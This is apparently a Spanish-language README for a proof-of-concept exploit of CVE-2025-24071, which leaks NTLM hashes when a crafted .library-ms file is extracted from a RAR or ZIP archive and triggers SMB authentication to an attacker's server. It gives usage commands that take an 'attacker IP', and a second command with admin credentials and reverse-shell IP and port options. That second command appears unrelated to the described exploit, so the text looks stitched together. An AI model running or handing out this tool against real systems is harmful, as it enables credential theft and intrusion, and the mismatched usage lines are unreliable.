
Exploit de prueba de concepto para CVE-2025-24071 (filtración de hash NTLM mediante extracción de archivo .library-ms de archivos RAR/ZIP). Activa la autenticación SMB al extraer, revelando hashes NTLM al servidor controlado por el atacante.
CVE-2025-24071: Fuga de hash NTLM a través de extracción RAR/ZIP y archivo .library-ms
>>python poc.py
>>enter file name: your file name
>>enter IP: attacker IP
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888